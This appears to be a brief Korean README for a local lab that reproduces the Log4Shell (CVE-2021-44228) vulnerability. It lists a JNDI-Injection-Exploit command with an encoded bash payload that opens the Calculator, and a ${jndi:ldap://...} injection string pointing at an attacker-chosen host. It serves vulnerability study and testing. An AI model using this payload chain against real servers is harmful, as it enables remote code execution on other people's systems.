
CVE-2021-44228 취약점 재현 환경 CVE-2021-44228 취약점 재현 환경
프로젝트를 시작한 후 접속: http://127.0.0.1:9090/vul
JDK 버전: java8u92 (너무 높은 버전은 피하십시오. 저와 동일한 버전을 권장합니다. 높은 버전은 JNDI 인젝션에 제한이 있습니다.)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
위 도구를 사용하여 PAYLOAD를 생성합니다.
http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx} 에 접속합니다.